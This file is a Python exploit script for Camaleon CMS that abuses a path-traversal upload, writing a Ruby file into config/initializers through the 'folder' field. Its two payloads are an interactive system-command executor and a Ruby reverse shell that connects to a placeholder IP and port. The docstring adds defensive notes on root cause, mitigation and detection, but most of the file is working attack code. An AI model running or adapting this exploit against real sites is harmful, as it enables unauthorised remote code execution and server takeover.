exploit_camaleon.py
import requests
def exploit_camaleon(auth_token, session_token, target_url, payload_type):
    """Send an authenticated media upload whose ``folder`` field leaves the upload root.

    Every request is a hand-built multipart POST to
    ``{target_url}/admin/media/upload?actions=false`` with three form fields:
    ``file_upload`` (a ``.rb`` file), ``folder`` (``../../../config/initializers/``)
    and ``skip_auto_crop`` (``true``).

    Args:
        auth_token: Value sent as the ``auth_token`` cookie.
        session_token: Value sent as the ``_cms_session`` cookie.
        target_url: Base URL; the upload path is appended to it unchanged.
        payload_type: ``"command_execution"`` prompts in a loop and sends one
            upload per entered line until ``exit`` is typed;
            ``"reverse_shell"`` sends a single upload. Any other value makes
            the function return without doing anything.

    Returns:
        None. Status and response bodies are printed.

    Review notes (defensive reading of this request):
        * Root cause shown here is a path-traversal file write: the server is
          expected to join ``folder`` onto its media directory, and the
          ``../`` segments move the destination into the application tree.
          In a Rails application (Camaleon CMS is one) files under
          ``config/initializers`` are loaded when the application boots, so
          a write there becomes code execution.
        * Server-side mitigation: canonicalise the requested folder and reject
          anything that resolves outside the media root, restrict accepted
          extensions/content types, keep the application code tree
          non-writable for the web process, and run a release in which the
          upload path is validated.
        * Detection: upload requests to ``/admin/media/upload`` whose
          ``folder`` part contains ``..``, and new or modified ``.rb`` files
          under ``config/initializers`` (file-integrity monitoring).
        * The request carries admin session cookies, so session hygiene
          (short lifetimes, revocation on suspicion) limits exposure.
    """
    request_headers = {
        'User-Agent': 'Mozilla/5.0',
        'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundary80dMC9jX3srWAsga',
        'Accept': '*/*',
        'Connection': 'keep-alive',
    }
    session_cookies = {
        'auth_token': auth_token,
        '_cms_session': session_token,
    }

    def build_form(file_name, payload):
        # Multipart body written by hand; the boundary must match the one
        # declared in the Content-Type header above.
        return (
            f'------WebKitFormBoundary80dMC9jX3srWAsga\r\n'
            f'Content-Disposition: form-data; name="file_upload"; filename="{file_name}"\r\n'
            f'Content-Type: text/x-ruby-script\r\n\r\n'
            f'{payload}\r\n'
            f'------WebKitFormBoundary80dMC9jX3srWAsga\r\n'
            f'Content-Disposition: form-data; name="folder"\r\n\r\n'
            f'../../../config/initializers/\r\n'
            f'------WebKitFormBoundary80dMC9jX3srWAsga\r\n'
            f'Content-Disposition: form-data; name="skip_auto_crop"\r\n\r\n'
            f'true\r\n'
            f'------WebKitFormBoundary80dMC9jX3srWAsga--\r\n'
        )

    def send_upload(form_body):
        # NOTE(review): verify=False turns TLS certificate checking off, so
        # the session cookies are sent to whichever host answers.
        return requests.post(
            f"{target_url}/admin/media/upload?actions=false",
            headers=request_headers,
            cookies=session_cookies,
            data=form_body,
            verify=False,
        )

    def command_loop():
        while True:
            command = input("Enter a system command to execute (or type 'exit' to quit): ")
            if command.lower() == "exit":
                print("Exiting command execution mode.")
                return

            # The entered line is placed verbatim inside the Ruby source.
            ruby_source = (
                'puts "==============================="\r\n'
                'puts "= EXECUTING SYSTEM COMMANDS ="\r\n'
                'puts "==============================="\r\n'
                f'system("{command}")\r\n'
                'puts "==============================="\r\n'
            )
            reply = send_upload(build_form('command_exec.rb', ruby_source))

            # A 200 only reports that the server accepted the upload; it says
            # nothing about whether the written file was ever loaded.
            if reply.status_code == 200:
                print(f"Command '{command}' executed successfully!")
            else:
                print(f"Failed to execute '{command}' with status code: {reply.status_code}")
            print("Response: ", reply.text)

    def reverse_shell_upload():
        # 'your_ip' / your_port are unfilled placeholders in the original.
        ruby_source = (
            "require 'socket'\r\n"
            "s = TCPSocket.open('your_ip', your_port)\r\n"
            "while (cmd = s.gets)\r\n"
            " IO.popen(cmd, 'r') do |io|\r\n"
            " s.print io.read\r\n"
            " end\r\n"
            "end\r\n"
        )
        reply = send_upload(build_form('reverse_shell.rb', ruby_source))

        # As above: the status code reflects the upload request only.
        if reply.status_code == 200:
            print("Exploit executed successfully with reverse shell!")
            return
        print(f"Failed with status code: {reply.status_code}")
        print("Response: ", reply.text)

    if payload_type == "command_execution":
        command_loop()
    elif payload_type == "reverse_shell":
        reverse_shell_upload()
if __name__ == "__main__":
    # The three values below are placeholders, not working credentials or a
    # real host; the script does nothing useful until they are replaced.
    auth_token = "your_auth_token_here"
    session_token = "your_session_token_here"
    target_url = "https://target_site_here"

    # The mode is taken from stdin and is not validated here; any value other
    # than the two named in the prompt makes exploit_camaleon return silently.
    raw_choice = input("Enter payload type ('reverse_shell' or 'command_execution'): ")
    payload_type = raw_choice.strip()

    exploit_camaleon(
        auth_token=auth_token,
        session_token=session_token,
        target_url=target_url,
        payload_type=payload_type,
    )